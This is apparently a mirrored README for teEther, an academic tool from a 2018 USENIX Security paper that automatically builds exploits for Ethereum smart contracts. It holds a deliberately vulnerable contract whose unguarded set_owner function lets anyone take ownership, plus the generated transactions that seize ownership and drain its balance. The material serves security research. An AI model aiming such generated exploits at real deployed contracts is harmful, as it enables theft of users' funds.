Giters

ringowang / teether

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

teEther - Analysis and automatic exploitation framework for Ethereum smart contracts

teEther is an analysis tool for Ethereum smart contracts. It can

Quickstart

  1. Write your vulnerable smart contract
pragma solidity ^0.4.0;

contract Test{

    struct Transaction{
        address to;
        uint amount;
    }

    mapping (bytes32 => Transaction) transactions;

    address owner;
    
    function set_owner(address new_owner){
        owner = new_owner;
    }
    
    function new_transaction(address to, uint amount) returns (bytes32){
        bytes32 token = sha3(to, amount);
        Transaction storage t = transactions[token];
        t.to = to;
        t.amount += amount;
        return token;
    }
    
    function approve(bytes32 token){
        require(owner == msg.sender);
        Transaction storage t = transactions[token];
        t.to.transfer(t.amount);
        delete transactions[token];
    }
    
}
  1. Compile your contract
$ solc --bin test.sol | tail -n1 > test.code
  1. Extract the deployed contract code
$ python bin/extract_contract_code.py test.code > test.contract.code
  1. Generate an exploit
$ python bin/gen_exploit.py test.contract.code 0x1234 0x1000 +1000

...
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x7cb97b2b0000000000000000000000000000000000000000000000000000000000001000", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x0129ab2700000000000000000000000000000000000000000000000000000000000012340000000000000000000000000000000000000000000000016bc75e2d63100103", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0xa53a1adfce9e2ef9fe2568f35b22f98bb749862a13e0abd291c6ba4967016d629412829d", to:"0x4000000000000000000000000000000000000000", gasPrice:0})

Academia

Our paper teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts was published at the 27th USENIX Security Symposium (Usenix Security 18) (slides, video).

@inproceedings{teEther2018,
          author = {Johannes Krupp and Christian Rossow},
       publisher = {USENIX Association},
       booktitle = {27th USENIX Security Symposium (USENIX Security 18)},
            year = {2018},
           title = {{teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts}},
             url = {https://publications.cispa.saarland/2612/},
}

About

License:Apache License 2.0

Languages

Language:Python 100.0%